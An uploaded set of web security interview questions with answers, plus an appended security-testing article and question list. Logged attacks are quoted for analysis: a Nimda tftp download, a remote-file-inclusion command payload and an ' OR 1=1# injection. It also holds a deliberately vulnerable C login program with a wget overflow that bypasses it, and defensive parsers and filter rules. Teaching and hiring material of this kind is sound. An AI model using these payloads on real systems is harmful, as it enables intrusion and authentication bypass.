Web Security Interview Question

The document provides sample interview questions for evaluating candidates for web security positions. The entry level questions gauge a candidate's knowledge of current threats, how they stay informed, and challenges of web monitoring. The advanced questions test understanding of log files, authentication vulnerabilities, and how to respond to attacks. The goal is not to have right answers but spark relevant discussion of web security topics.

Uploaded by arunika pal

Web Security Interview Questions

The goal of this document is to provide appropriate questions for HR/Managers to pose to individuals who are applying for web security related positions. These questions do not have right or wrong answers, but rather spark relevant conversation between the applicant and the hiring staff.

Entry Level Questions

1. What do you see as the most critical and current threats affecting Internet accessible websites?

Goal of question – To gauge the applicant’s knowledge of current web related threats. Topics such as Denial of Service, Brute Force, Buffer Overflows, and Input Validation are all relevant topics. Hopefully they will mention information provided by web security organizations such as the Web Application Security Consortium (WASC) or the Open Web Application Security Project (OWASP).

2. What online resources do you use to keep abreast of web security issues? Can you give an example of a recent web security vulnerability or threat?

Goal of question – Determine if the applicant utilizes computer security resources such as CERT, SANS Internet Storm Center or ICAT. Email lists such as securityfocus, bugtraq, SANS @RISK, etc. are also good resources. Recent examples of threats will vary depending on current events, but issues such as new web based worms (PHP Santy Worm) or widely used applications (awstats scripts) are acceptable.

3. What do you see as challenges to successfully deploying/monitoring web intrusion detection?

Goal of question – We are attempting to see if the applicant has a wide knowledge of web security monitoring and IDS issues such as:

• Limitations of NIDS for web monitoring (SSL, semantic issues with understanding HTTP)
• Proper logging – increasing the verbosity of logging (Mod_Security audit_log)
• Remote Centralized Logging
• Alerting Mechanisms
• Updating Signatures/Policies

4. What is your definition of the term “Cross-Site Scripting”? What is the potential impact to servers and clients?

Goal of question – This question will determine if the applicant is well versed in the terminology used in web security. The applicant needs to be able to articulate highly technical topics to a wide audience. The second question will help to verify that the applicant fully understands how XSS attacks work and the impact to client information. WASC has a web security glossary of terms that may be of help - http://www.webappsec.org/glossary.html

Cross-Site Scripting: (Acronym – XSS) An attack technique that forces a web site to echo client-supplied data, which executes in a user’s web browser. When a user is Cross-Site Scripted, the attacker will have access to all web browser content (cookies, history, application version, etc). XSS attacks do not typically directly target the web server or application, but are rather aimed at the client. The web server is merely used as a conduit for the XSS data to be presented to the end client. See also “Client-Side Scripting”.

5. What are the most important steps you would recommend for
securing a new web server? Web application?

Goal of question – Once again, there is no right or wrong answer, however we are interested in what the applicant views as important.

Web Server Security:

• Update/Patch the web server software
• Minimize the server functionality – disable extra modules
• Delete default data/scripts
• Increase logging verbosity
• Update Permissions/Ownership of files

Web Application Security:

• Make sure Input Validation is enforced within the code - Security QA testing
• Configure the application to display generic error messages
• Implement a software security policy
• Remove or protect hidden files and directories

Advanced Level Questions

1. Imagine that we are running an Apache reverse proxy server and one of the servers we are proxying for is a Windows IIS server. What does the log entry suggest has happened? What would you do in response to this entry?

68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200 566 "-" "-"

Goal of question – To see if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.

If you were not using Apache as the reverse proxy, what Microsoft
application/tool could you use to mitigate this attack?

You could use either Microsoft's Internet Security and Acceleration (ISA) Server as a front-end proxy or implement URLScan on the target IIS server. The urlscan.ini file has the AllowDotInPath directive which will block directory traversal attempts.

2. You are engaged in a penetration-test where you are attempting to gain access to a protected location. You are presented with this login screen:
What are some examples of how you would attempt to gain access?

Goal of question – Determine if the applicant has a wide knowledge of different authentication vulnerabilities. They may attempt default usernames/passwords or attempt SQL Injection queries that provide an SQL true statement (such as – ' OR 1=1#). If they provide SQL examples, then offer them the following Error document information and ask them what this indicates.

ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 4: Incorrect syntax near '='.
Data Source = "ECommerceTheArchSupport2"
SQL = "SELECT QuickJump_Items.ItemId FROM QuickJump_Items WHERE QuickJump_Items.ItemId <> 0 AND QuickJumpId ="
The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (1:1) to (1:42) in the template file K:\InetPub\clients\login\http\ailment.cfm
The specific sequence of files included or processed is:
K:\INETPUB\CLIENTS\LOGIN\HTTP\AILMENT.CFM

This error message indicates that the target web application is running Microsoft SQL Server and discloses directory structures.

3. What application generated the log file entry below? What type of
attack is this? Assuming the index.php program is vulnerable, was
this attack successful?

========================================
Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: www.foo.com
Connection: keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "uname\x20-a" at POST_PAYLOAD
mod_security-action: 403

65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a

Goal of question – To verify that the applicant can interpret various web log files, identify attacks and possible impacts. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are in the POST PAYLOAD of the request. This attack was not successful for the following two reasons:

• The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the “uname -a” data in the POST PAYLOAD.
• The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon “;” between the ls and uname commands. The target host would fail to execute the “lsuname” command.
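As an added example (my code, not part of the original question set), here is a small Python parser for the Mod_Security 1.x audit_log block above: it pulls out the request summary, the headers, the blocking decision and the command chain in the POST payload, so both reasons the attack failed become visible programmatically. The sample entry is constructed from the one above with the remote file host replaced by a placeholder, and the function names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed copy of the audit_log entry above (mod_security 1.x layout); the remote
# file host in the payload is replaced by a placeholder.
AUDIT_ENTRY = r"""========================================
Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 -0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: www.foo.com
Connection: keep-alive
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "uname\x20-a" at POST_PAYLOAD
mod_security-action: 403

lid=http://attacker.example/lila.jpg?&cmd=cd /tmp;id;lsuname -a
"""

REQUEST_RE = re.compile(
    r'^Request: (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)
MATCH_RE = re.compile(r'Pattern match "([^"]+)" at (\S+)')


def parse_audit_entry(entry):
    """Split one audit_log block into its summary, request line, headers and body."""
    lines = entry.strip("\n").splitlines()
    rec = {"headers": {}, "payload": ""}
    i = 0
    # Summary section: the lines before the dashed separator
    while i < len(lines) and not lines[i].startswith("----------"):
        m = REQUEST_RE.match(lines[i])
        if m:
            rec.update(m.groupdict())
            rec["status"] = int(rec["status"])
        elif lines[i].startswith("Handler:"):
            rec["handler"] = lines[i].split(":", 1)[1].strip()
        i += 1
    i += 1  # skip the separator
    if i < len(lines):
        rec["request_line"] = lines[i]
        i += 1
    # Header section: up to the first blank line
    while i < len(lines) and lines[i].strip():
        name, _, value = lines[i].partition(":")
        rec["headers"][name.strip().lower()] = value.strip()
        i += 1
    # Body section: whatever follows the blank line
    rec["payload"] = "\n".join(lines[i + 1:]).strip()
    return rec


def parse_form_body(body):
    """Decode an application/x-www-form-urlencoded body, splitting on '&' only so that
    ';' inside a value (the command separator in this attack) survives."""
    params = {}
    for pair in body.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote_plus(key)] = unquote_plus(value)
    return params


def triage(rec):
    """Answer the three questions: what blocked it, is it file inclusion, what would have run."""
    headers = rec["headers"]
    m = MATCH_RE.search(headers.get("mod_security-message", ""))
    params = parse_form_body(rec["payload"])
    # Remote file inclusion sign: a parameter whose value is itself a URL
    rfi_params = sorted(k for k, v in params.items()
                        if v.lower().startswith(("http://", "https://", "ftp://")))
    # The injected shell chain: each ';'-separated piece is one command the target would run,
    # which is how the missing ';' before 'uname' shows up as the bogus 'lsuname -a'
    commands = [c.strip() for c in params.get("cmd", "").split(";") if c.strip()]
    return {
        "blocked": headers.get("mod_security-action") == "403" or rec.get("status") == 403,
        "pattern": m.group(1) if m else None,
        "matched_in": m.group(2) if m else None,
        "rfi_params": rfi_params,
        "commands": commands,
    }
```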

4. One of your web servers is logging multiple requests similar to the following:

201.1.199.155 - - [26/Dec/2004:01:55:48 -0500] "PUT /hacked.htm HTTP/1.0" 403 769 "Microsoft Data Access Internet Publishing Provider DAV 1.1" "-"

What does this log entry indicate? How could you identify what the
contents are of the “hacked.htm” file that the attacker is trying to
upload?

Goal of question – Determine if the applicant can identify both the attack (a web defacement attempt using the HTTP PUT Method), as well as the logging limitations of CLF. In this type of attack, the defacement text is sent in the request body and not on the URL Request line. In order to identify this data, a network sniffing application would need to be utilized. An application such as Snort could be used with a custom rule to identify this activity. Here is an example rule –

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"LOCAL Put attempt"; flow:to_server,established; tag:session,50,packets; pcre:"/^PUT /A"; sid:3000001; rev:1;)
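As an added example (my code, not from the original document), a Python triage pass over CLF lines covering the scenarios of questions 1 and 4: it flags the cmd.exe probe and the follow-up tftp stage, escalating to "inspect the proxied host" only when the probe returned 200 and the second stage was seen, and it flags PUT requests, whose body CLF cannot show. The sample lines are the ones quoted in those questions plus one constructed benign request; the function names are my own.

```python
import re
from urllib.parse import unquote

# Common Log Format, with the optional referer/user-agent pair of the combined format.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# The lines quoted in questions 1 and 4, plus one constructed benign request (203.0.113.9).
SAMPLE_LOG = [
    r'68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"',
    r'68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200 566 "-" "-"',
    r'201.1.199.155 - - [26/Dec/2004:01:55:48 -0500] "PUT /hacked.htm HTTP/1.0" 403 769 "Microsoft Data Access Internet Publishing Provider DAV 1.1" "-"',
    r'203.0.113.9 - - [26/Dec/2004:02:00:00 -0500] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]


def parse_clf(line):
    """Return a dict for one CLF/combined log line, or None if it does not parse."""
    m = CLF_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Percent-decode once so encoded traversal/command strings are visible to the checks
    rec["decoded"] = unquote(rec["target"])
    return rec


def classify(rec):
    """Map one parsed request to a finding name from the questions above, or None."""
    low = rec["decoded"].lower()
    if "cmd.exe" in low or "/winnt/system32/" in low or "../" in low:
        # Nimda: first a 'cmd.exe?/c+dir' probe, then a tftp download if the probe worked
        return "nimda-tftp-stage" if "tftp" in low else "cmd-exe-probe"
    if rec["method"] == "PUT":
        # WebDAV/HTTP PUT: the uploaded content is in the body, which CLF never records
        return "put-upload-attempt"
    return None


def analyse(lines):
    """Classify each line and correlate per client IP.

    A client whose cmd.exe probe got a 200 and who then sent the tftp stage is the
    case in question 1: the proxy itself is not vulnerable, but the proxied IIS host
    must be checked. PUT sources are the case in question 4."""
    findings = []
    by_ip = {}
    for line in lines:
        rec = parse_clf(line)
        if rec is None:
            continue
        kind = classify(rec)
        if kind is None:
            continue
        findings.append({"ip": rec["ip"], "kind": kind, "status": rec["status"],
                         "method": rec["method"], "target": rec["target"]})
        state = by_ip.setdefault(rec["ip"], {"probe_ok": False, "tftp_stage": False, "put": False})
        if kind == "cmd-exe-probe" and rec["status"] == 200:
            state["probe_ok"] = True
        elif kind == "nimda-tftp-stage":
            state["tftp_stage"] = True
        elif kind == "put-upload-attempt":
            state["put"] = True
    inspect_backend = sorted(ip for ip, s in by_ip.items() if s["probe_ok"] and s["tftp_stage"])
    put_sources = sorted(ip for ip, s in by_ip.items() if s["put"])
    return {"findings": findings, "inspect_backend": inspect_backend, "put_sources": put_sources}
```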

5. You have been asked to review the source code for a compiled
script that is being used to validate logon credentials for a web
application. The file is called “logon_validate” and a typical logon
request looks like this –

“GET /cgi-bin/logon_validate?login=test&password=test”

The source code is shown below –

#include <stdlib.h>
#include <string.h>

/* The original pseudo-code leaves these two undefined; placeholder values added here */
#define GOOD_USER "validuser"
#define GOOD_PASS "validpass"

void show_error(void) {
    // AUTHENTICATION ERROR
    exit(-1);
}

int main(int argc, char **argv) {
    char error_on_auth='1';      /* '1' = not authenticated */
    char user[128];              /* declared right after error_on_auth: adjacent on the stack */
    char pass[128];
    char *ch_ptr_begin;
    char *ch_ptr_end;
    char *query;

    /* The original shows ****QUERY_STRING****; a CGI program reads it from the environment */
    query=getenv("QUERY_STRING");
    if (query==NULL)
        show_error();
    query=strdup(query);         /* private copy: the parsing below writes NUL bytes into it */
    if (query==NULL)
        show_error();

    /**********************************/
    /* Get Username from Query String */
    /**********************************/
    ch_ptr_begin=(char *)strstr(query,"login=");
    if (ch_ptr_begin==NULL)
        show_error();
    ch_ptr_begin+=6;
    ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");
    if (ch_ptr_end==NULL)
        show_error();
    *(ch_ptr_end++)='\0';
    strcpy(user,ch_ptr_begin);   /* unbounded copy into a 128-byte buffer */

    /**********************************/
    /* Get Password from Query String */
    /**********************************/
    ch_ptr_begin=(char *)strstr(ch_ptr_end,"password=");
    if (ch_ptr_begin==NULL)
        show_error();
    ch_ptr_begin+=9;
    ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");
    if (ch_ptr_end!=NULL) *(ch_ptr_end++)='\0';
    strcpy(pass,ch_ptr_begin);   /* same unbounded copy */

    if ((strcmp(user,GOOD_USER)==0) && (strcmp(pass,GOOD_PASS)==0))
        error_on_auth='0';

    if (error_on_auth=='0') {
        // AUTHENTICATION OK!!
    } else {
        // AUTHENTICATION ERROR
        show_error();
    }

    // return(0); hehe could be evil ;PPPPP

    exit(0);
}

This pseudo-code is taken from the NGSec Web Auth Games: http://quiz.ngsec.biz:8080/game1/level6/replicant.php

Do you see any problems with this script? How could an attacker
exploit this script to bypass the authentication mechanisms in this
script? What are some mitigation options?

Goal of question – This is most likely the most complex question being
asked during the interview due to the fact that the applicant will need
to apply multiple layers of analysis, including both the attacker and
defender perspectives.

Reference “Smashing The Stack For Fun And Profit” for technical details – http://www.phrack.org/phrack/49/P49-14

The security issue with this script has to do with a buffer overflow problem in the way that the script is using the “error_on_auth” condition. The error_on_auth condition is initially declared to be “1”, which means that the user is not authenticated. The “user” buffer was declared directly after the error_on_auth and has been allocated 128 bytes. Due to the ordering of the declaration of the error_on_auth and user variables, they occupy adjacent locations on the running stack. The result is that if the attacker submits a username that is 129 bytes (with the last byte being “0”), they can overwrite the error_on_auth data. A request such as the following, or the equivalent Unix command, would achieve this goal –

http://www.companyx.com/cgi-bin/validate_logon?logon=00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

or

# wget "http://www.companyx.com/cgi-bin/validate_logon?logon=$(perl -e 'print "0"x129')"

Mitigation options include the following:

• Update the validate_logon source code to fix the problem, such as using strncpy() instead of strcpy().
• If the source code could not be updated, then security filters would need to be implemented on the web server.
• Using Mod_Security, you could implement some security filters for the “validate_logon” URL such as these:
  o Only allow letters in the username argument. This would prevent the client from overwriting the error_on_auth data with a zero.

<Location /cgi-bin/validate_logon>
SecFilterSelective ARG_LOGIN "!^[a-zA-Z]"
</Location>

  o You could also add another rule to restrict the size of the username/password arguments to be less than 129 characters.

<Location /cgi-bin/validate_logon>
SecFilterSelective ARG_LOGIN "!^[a-zA-Z]"
SecFilterSelective ARG_LOGIN|ARG_PASSWORD ".{129,}"
</Location>

A web application firewall (WAF) device could be implemented on the network to protect the entire web site. These devices have positive policy capability that should identify these types of attacks as "anomalous" and deny them. A brief listing of WAF vendors includes Teros, NetContinuum, Imperva, Watchfire, Breach, Axiliance, and others.
1 Security Testing approach for Web Applications
2 What is Security Testing?
Security testing is one of the most important types of software testing; it is intended to find the vulnerabilities or weaknesses of a software application. The main objective of security testing is to find the vulnerabilities of the system and determine whether its data and resources are protected from possible intruders. Security testing allows us to identify whether confidential data stays confidential or not.

Nowadays online transactions are increasing rapidly, so security testing of web applications is one of the most important things to be carried out while testing them. Security testing is to be carried out once the system is developed and installed. To identify vulnerabilities, network security testing should be performed periodically.

There are “Seven attributes of Security Testing”, as follows:

• Authentication
• Authorization
• Confidentiality
• Availability
• Integrity
• Non-repudiation
• Resilience

The pie chart below, created from the Web Hacking Incident Database (WHID) for 2011, clearly shows that whilst many different attack methods exist, SQL injection and XSS are the most popular.
Image Credit: @acunetix.com
3 6 basic terms used in Security Testing
Here are the useful terms frequently used in security testing:

1) What is “Penetration Testing”?

Penetration testing is a type of security testing process to identify security vulnerabilities in an application by evaluating the system or network with various malicious techniques. The main purpose of this testing is to fix the identified vulnerabilities and secure the important data from unauthorized users, such as hackers, who should not have access to the system. Penetration testing should be carried out only after careful consideration, notification and planning.

There are two types of penetration testing: white box testing and black box testing. In white box testing, all information is available to the tester before testing starts, such as IP addresses, code and infrastructure diagrams, and the tester performs the testing based on that information. In black box testing, the tester has no information about the system under test. This is a more accurate testing method, as it simulates real attackers, who do not have information about the existing system.

2) Password cracking:

In security testing of a web application, password cracking programs can be used to identify weak passwords. It can start with guessing common usernames and passwords or with the use of a password cracking tool. Password cracking confirms that users are making use of adequately strong passwords.
In the system, passwords are generally stored in a non-plaintext format such as a hash, so once the user tries to log in using their credentials, a hash is created for the newly entered password and compared with the original stored hash; once the stored hash matches, the user is authenticated. Automated password cracking basically generates candidate passwords and their hashes until a match is found. The most commonly used password cracking method is the dictionary attack, in which an automated tool tries all the words from a dictionary.

Cracking would be easier if the application does not require complex passwords, for example passwords that must contain at least one digit, one letter and one special character. Sometimes passwords are stored in cookies; if such login credential information is stored in cookies without encryption, then a hacker can use different methods to get the username and password information.

3) What is “Vulnerability”?

A vulnerability is a weakness in the system under test which may allow malicious attacks by unauthorized users. Vulnerabilities can increase due to bugs in the software, a lack of security testing, viruses, etc. These security vulnerabilities require patches, or fixes, in order to prevent the potential compromise of integrity by hackers or malware.

4) What is “URL manipulation”?

URL manipulation is a very interesting and very common type of attack by hackers. In this attack the hackers manipulate the website URL query strings and capture important information.

This happens when the application uses the HTTP GET method to pass information between the client and the server. The information is passed in parameters in the query string. The tester can modify a parameter value in the query string to check if the server accepts it.

Via an HTTP GET request, user information is passed to the server for authentication or for fetching data. An attacker can manipulate every input variable passed from this GET request to the server in order to get the required information or to corrupt the data. In such conditions any unusual behavior by the application or web server is a doorway for the attacker to get into the application.

So while security testing, URL manipulation test cases should be considered to make sure that an unauthorized user is not able to access important information or corrupt database records using URL manipulation.
5) What is “SQL injection”?

SQL injection is one of the most common application layer attack techniques used by hackers. It is one of several web attack mechanisms used by hackers to steal data from organizations. SQL injection attacks are very critical, as the attacker can get vital information from the server database. It is a type of attack which takes advantage of loopholes in the implementation of a web application that allow a hacker to compromise the system, for example by passing SQL queries into all input fields.

Hackers try to query the database with SQL injection statements, or parts of SQL statements, supplied as user input, and pull out vital information from the system or crash the system; from the error displayed in the browser they can get the information they are looking for.

To check for SQL injection we have to take care of input fields such as text boxes, comments, etc. Special characters should be either properly handled or stripped from the input.
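As an added example (my code, not from the original document) serving both this section and the ODBC error in advanced question 2, here is that leaked query rebuilt in Python over SQLite, once by string concatenation as the failing template evidently does and once with a bound parameter, together with the contrast between a verbose error that leaks the SQL and a generic one. The table contents are constructed, and the numeric payload `0 OR 1=1` is used because QuickJumpId is compared to a bare number in the leaked statement (the `#` comment in the page's `' OR 1=1#` example is MySQL syntax and does not apply to SQLite).

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the QuickJump_Items table named in the error."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE QuickJump_Items (ItemId INTEGER, QuickJumpId INTEGER, Name TEXT)")
    con.executemany("INSERT INTO QuickJump_Items VALUES (?, ?, ?)",
                    [(1, 10, "public"), (2, 11, "internal"), (3, 12, "restricted")])
    return con


# The statement fragment exactly as the ODBC error disclosed it
BASE_SQL = ("SELECT QuickJump_Items.ItemId FROM QuickJump_Items "
            "WHERE QuickJump_Items.ItemId <> 0 AND QuickJumpId = ")


def lookup_vulnerable(con, quick_jump_id):
    """Concatenates the request value into the SQL text, as the failing template evidently does.
    An empty value reproduces the 'Incorrect syntax near =' failure; '0 OR 1=1' returns every row."""
    sql = BASE_SQL + quick_jump_id
    try:
        rows = sorted(r[0] for r in con.execute(sql))
        return {"rows": rows, "error": None}
    except sqlite3.Error as exc:
        # Verbose error page: leaks the statement (and, in the real case, DB type and file paths)
        return {"rows": [], "error": f"{exc} in: {sql}"}


def lookup_safe(con, quick_jump_id):
    """Binds the value as a parameter, so it can never change the statement's structure,
    and answers bad input with a generic message instead of the SQL text."""
    try:
        value = int(quick_jump_id)   # the column is numeric; reject anything else up front
    except ValueError:
        return {"rows": [], "error": "invalid id"}
    rows = sorted(r[0] for r in con.execute(BASE_SQL + "?", (value,)))
    return {"rows": rows, "error": None}
```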

6) Cross Site Scripting (XSS)

Cross-site scripting (also known as XSS or CSS) is a type of computer security vulnerability typically found in web applications. Cross-site scripting is one of the most common application layer hacking techniques. It is a vulnerability in a web application that allows an attacker to inject HTML and JavaScript code into a web page. This type of attack injects malicious scripts into victims’ web browsers. These malicious scripts are used to steal the vital information stored in the cookies.
4 Types of testing to perform while Security Testing
Let’s discuss the steps to prepare while planning for security testing:

• The first step is to understand the business requirements, security goals and objectives in terms of the security compliance of the organization. The test planning should consider all security factors, for example the organization might have planned to achieve PCI compliance.
• Understand and analyze the requirements of the application under test.
• Collect all system setup information used for development of the software and network, such as operating systems, technology and hardware.
• Make a list of vulnerabilities and security risks.
• Based on the above step, prepare a threat profile.
• Based on the identified threats, vulnerabilities and security risks, prepare a test plan to address these issues.
• For each identified threat, vulnerability and security risk, prepare a traceability matrix.
• Not all security testing can be executed manually, so identify tools to execute the security test cases faster and more reliably.
• Prepare the security test case document.
• Execute the security test cases and retest the defect fixes.
• Execute the regression test cases.
• Prepare a detailed report of the security testing which contains the vulnerabilities and threats found, detailing risks and still open issues, etc.
5 Seven attributes of Security Testing
Security testing is to be carried out to make sure that the system prevents unauthorized users from accessing resources and data. In web applications and client-server applications, security testing plays an important role. In the previous article we learned about security testing, and in today’s article we concentrate on the “Seven attributes of security testing”.

Security testing needs to cover the seven attributes of security testing: Authentication, Authorization, Confidentiality, Availability, Integrity, Non-repudiation and Resilience. So let’s discuss them one by one below:

1) Authentication:

Authentication is the process of identifying a person before they access the system. It allows a user to access system information only if the authentication check passes. Apart from the username and password combination, authentication can be implemented in different ways, such as asking a secret question and answer, an OTP (One Time Password) over SMS, biometric authentication, token-based authentication like an RSA SecurID token, etc. It is also possible to use combinations of the above options for authentication.

2) Authorization:

Once authentication has passed, authorization comes into the picture to limit the user as per the permissions set for that user. Authorization is generally implemented with access control lists, user roles or user groups, which define the permissions and restrictions for a specific user group, or by granting or revoking privileges for individual users.
3) Confidentiality:

Confidentiality testing is carried out to check that unauthorized users and less privileged users are not able to access the information. It checks the protection of information and resources from users other than those authorized and authenticated. Confidentiality of information is checked at all stages: processing, storage and display of the information. It is checked that the information is stored in the database in encrypted format and not in plain format. Also check whether, when the information is accessed by an administrator or developer, all information is displayed in encrypted format or not.

4) Availability:

Availability testing checks that the system is available for authorized users whenever they want to use it, except for maintenance windows and upgrades for security patches. Downtime of the system should be minimal, but downtime can be due to natural disasters or hardware failure. Most of the time a backup failover site runs in parallel with the main site. Once the main site goes down for some reason, all requests to the main site are redirected to the backup site. One more example of availability is the mirroring of databases. In this concept there are two databases: one is the main primary database, the other is the secondary (mirror) database. Once a new record is added, updated or deleted in the system, this action is taken in the main primary database, and once any action is taken in the primary database the updated data gets reflected in the secondary database. In this way the primary and secondary databases are mirrored to each other. Once a failure of the primary database is observed, the secondary database comes into the picture and reduces the downtime and increases the availability of the system.

5) Integrity:

Integrity is to make sure that the information received is not altered in transit, and to check that the correct information is presented to the user as per the user groups, privileges and restrictions.

6) Non-repudiation:

Tracking who is accessing the systems and which requests were denied, along with additional details like the timestamp and the IP address the requests came from. This means a confirmation sent by the receiver to the sender that the requested services or information were successfully received, as a digital confirmation, e.g. digital certificates; this not only serves as acknowledgement but also helps to validate that both sender and receiver are genuine.

7) Resilience:

Resilience is to check that the system is able to resist attacks; this can be implemented using encryption, OTP (One Time Password), two-layer authentication or an RSA key token.

I think I have addressed all major attributes of security testing. If I missed out addressing some important point in security testing then let me know in the comments below. I will keep on updating the article with the latest testing information.

If you enjoyed reading this article please make sure to share it with your friends. Please leave your questions/tips/suggestions in the comment section below and I’ll try to answer as many as I can.

Security/Penetration Testing Interview Questions


• What types of security testing have you performed?
• What types of web testing security problems do you know?
• Please classify vulnerabilities that you know.
• What are two common techniques used to protect a password file?
• What is integer overflow?
• What is your understanding of root causes of vulnerabilities?
• What is ISO 17799?
• Can you describe security defect prevention?
• List and briefly define three classes of intruders.
• What are three benefits that can be provided by an intrusion detection
system?
• What services are provided by the SSL Record Protocol?
• Why do we need to validate users’ input for length and characters?
• Why do we need to keep track of individual users and authentication?
• What is runtime inspection?
• Describe, with examples, fuzzer and sniffer tools.
• Define buffer overflows.
• What are format string vulnerabilities?
• What is SQL injection?
• Provide example of command injection.
• Provide example of broken access control.
• List and briefly define the parameters that define an SSL session state.
• List and briefly define the parameters that define an SSL session connection.
• Why do we need port scanning?
• How to use an interactive proxy and a set of fuzz strings to manually test the
application’s handling of data?
• What is cookie gathering?
• What is a honeypot?
• What is a phishing attack?
• What is a dual signature and what is its purpose?
• How can you ensure that all input fields are properly validated to prevent code
injection attacks?
• What tools can you use to validate the strength of SID (session ID)?
• What is file enumeration?
• What steps are involved in the SSL Record Protocol transmission?
• What are hidden fields in HTTP?
• What protocols comprise SSL?
• How to implement (create) a custom fuzz utility and test it against your
application?
• Describe SOAP and WSDL.
• List and briefly define the principal categories of SET participants.
• How to test a scriptable ActiveX object?
• What is the difference between statistical anomaly detection and rule-based
intrusion detection?
• What metrics are useful for profile-based intrusion detection?
• What is the difference between rule-based anomaly detection and rule-based
penetration identification?
• What is a salt in the context of UNIX password management?
• List and briefly define four techniques used to avoid guessable passwords.
• What is the difference between an SSL connection and an SSL session?
• List and briefly define acronyms and abbreviations related to software security.
• Write an example of misusing strcpy() in C and C++ in such a way that a buffer overflow condition exists as a bug.
• Why do we use a firewall for security when we have facilities like access lists on routers?
• What are the most important steps you would recommend for securing a new
web server? Web application?
• You have been asked to review the source code for a compiled script that is
being used to validate logon credentials for a web application. The file is
called "logon_validate" and a typical logon request looks like this -
• If you were not using Apache as the reverse proxy, what Microsoft
application/tool could you use to mitigate this attack?
• What do you see as challenges to successfully deploying/monitoring web
intrusion detection?
• What online resources do you use to keep abreast of web security issues?
Can you give an example of a recent web security vulnerability or threat?
• What does this log entry indicate? How could you identify what the contents
are of the "hacked.htm" file that the attacker is trying to upload?
• What are some examples of how you would attempt to gain access?
• What application generated the log file entry below? What type of attack is
this? Assuming the index.php program is vulnerable, was this attack
successful?
• One of your web servers is logging multiple requests similar to the following:
• What is your definition of the term "Cross-Site Scripting"? What is the potential
impact to servers and clients?
• What do you see as the most critical and current threats affecting Internet
accessible websites?
• What is a firewall?
• Describe how to manage a firewall
• What is a Denial of Service attack?
• What is a “spoofed” packet?
• What is a SYN Flood?
• What do you do if you are a victim of a DoS?
• What is GPG/PGP?
• What is SSH?
• What is SSL? How do you create certificates?
• What would you do if you discovered a UNIX or Network device on your
network has been compromised?
• What would you do if you discovered a Windows system on your
network has been compromised?
• What is DNS Hijacking?
• What is a log host?
• What is IDS or IDP, and can you give me an example of one?
• Why are proxy servers useful?
• What is web-caching?

• What are the most important steps you would recommend for securing a new web server?

The following are the most important steps for securing a new web server:
1. Update/patch the web server software
2. Minimize the server's functionality and disable the extra modules
3. Always remove the default scripts / data
4. Increase the verbosity of logging
5. Update the ownership / permissions of the files.

1.13.2 What are the most important steps you would recommend for securing a
new web server?

• Minimize rights.
• Update permissions.
• Delete default data and scripts.
• Make use of a software firewall.
• Enable and make use of IIS logging.
• Take regular backups.
• Keep the installed Windows tools updated.
